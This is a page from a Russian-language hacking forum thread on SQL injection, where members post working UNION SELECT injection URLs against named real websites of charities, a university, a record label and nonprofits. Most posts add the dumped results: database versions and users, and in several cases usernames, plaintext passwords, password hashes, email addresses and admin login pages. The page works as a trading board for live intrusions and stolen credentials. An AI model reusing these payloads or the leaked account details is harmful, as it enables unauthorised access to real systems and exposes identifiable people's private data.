HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 923 из 1602 « Первая < 423823873913 919 920 921 922 923 924 925 926 927 93397310231423 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.05.2009, 13:58
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию
http://www.neiljenkins.com/opera.php?op=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,password ,email,level),5,6,7+from+users+--+&id=opera1

http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter
 
Ответить с цитированием

  #2  
Старый 16.05.2009, 14:57
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
Pagerank: 5
http://www.radiobucuresti.ro/stire.php?id=-631+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7


Database Version: 5.0.67-log
Database name: rb2
User name: rb@localhost
Os: slackware-linux-gnu
 
Ответить с цитированием

  #3  
Старый 16.05.2009, 14:57
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию
Код:
http://www.scenic-circle.co.nz/hotel.asp?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104+from+news
Microsoft JET Database Engine

Кто сбрутит таблы какие-нить кроме news и Hotels, отпишитесь
 
Ответить с цитированием

  #4  
Старый 16.05.2009, 15:35
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
По умолчанию
www.ltefdonations.org

Код:
http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7
Версия - 5.0.75-community-log
Юзер - ltefdona_collect@localhost
БД - ltefdona_collector

Юзеры (всего 93):

Код:
http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,username,password,email),6,7+from+users+limit+1,1
Админка:
Код:
http://ltefdonations.org/admin/index.php
Код:
Name:minznerjosh
Pass:gateway400
 
Ответить с цитированием

  #5  
Старый 16.05.2009, 15:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
Код:
http://www.billiard-service.ru/lamp.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9
h2artif_d123456@www1.100mb.ru:h2artif_saites:5.0.4 5-community-log

PR: 6
amenez.phpnet.org
Код:
http://amenez.phpnet.org/Kam/volcano.php?id=11+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7
amenez2@10.0.0.84:amenez2:4.1.22-log
Последний раз редактировалось mailbrush; 16.05.2009 в 16:20..
 
Ответить с цитированием

  #6  
Старый 16.05.2009, 17:19
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
Код:
http://chocoisland.ru/chocolate.php?id=11+and+null+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())
z92680_site@77.221.130.21:z92680_site:5.0.32-Debian_7etch6-log
 
Ответить с цитированием

  #7  
Старый 17.05.2009, 01:54
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию
www.sonybmgmusic.co.uk
Просто красивая(как мне кажется) иньекция..
Пользователи, их пароли:
Цитата:
http://www.sonybmgmusic.co.uk/artists/annie_lennox'%20and%200%20union%20select%201,2,3,4 ,5,group_concat(concat_ws(0x3a,iu_id,iu_email,iu_p assword,iu_first_name)%20separator%20'%3Cbr%3E'),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20int ranet_users--%20
P.S. Это не боян,
гуглим site:forum.antichat.ru sonybmgmusic.co.uk/
результат выдал адрес
https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
где находится сообщение пользователя Buddah:
"нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет"
sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - а это почти ничего, тут даже инъекции нет, потаму что кроме других неверных моментов (которые имеют место быть), в первую очередь тут знак + не проходит за пробел, а проходит как просто символ '+', уже поэтому никакого order by в таком виде не будет. Написал это, потаму что кто-то обвинил в том, что я кинул боян.
Последний раз редактировалось Maestus; 17.05.2009 в 02:50..
 
Ответить с цитированием

  #8  
Старый 16.05.2009, 19:49
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
По умолчанию
onixvisn10.com

Код:
http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11
Версия - 5 5.0.67-community-log
Юзер - onixvisn_stfr1@localhost
БД - onixvisn_stfr1

Юзеры:

Код:
http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,User_nickname,user_passwd,user_email),7,8,9,10,11+from+users
Код:
Chuck Prickett:dcf24fe936aaf7ed828da2cef9901a60:visn10@idleworth.com
Админка:

Код:
Для начала нужно залогинится здесь - http://onixvisn10.com/login.php
А потом заходить сюда -  http://onixvisn10.com/admin/
Код:
Email Address - visn10@idleworth.com
Password - 2resume
 
Ответить с цитированием

  #9  
Старый 16.05.2009, 23:34
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию
http://www.usmcoc.org {PR 6}
Код:
http://www.usmcoc.org/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
5.0.67-community : vicom_usmcoc : vicom_usmcoc@localhost

tables:
Код:
http://www.usmcoc.org/event.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables--
------------------------------------------------------------------------------------------------

http://www.fraudadvisorypanel.org {PR 5}
Код:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--
4.1.22 : fap_events: fap_events@83.223.106.10

table users:
Код:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+users--
username : password
fap:apw4fap
testuser:testpword
Tamaryn:michael
MiaCampbell:Molly74

http://www.fraudadvisorypanel.org/newmembers/login.php

------------------------------------------------------------------------------------------------

http://www.monroenc.org {PR 5}
Код:
http://www.monroenc.org/events.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9--
version() - 5.0.67
database - monroenc
user - monroenc@localhost
Последний раз редактировалось Skofield; 17.05.2009 в 00:40..
 
Ответить с цитированием

  #10  
Старый 16.05.2009, 23:36
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию
PR6
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,concat_ws(0x3a,user,password)+from+mysql.user/*
Database Version: 4.1.21-standard
Database name: gaston_db
User name: tltltl@info.umb.edu

root:00c8bef335a35d31
 
Ответить с цитированием
Ответ
Страница 923 из 1602 « Первая < 423823873913 919 920 921 922 923 924 925 926 927 93397310231423 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.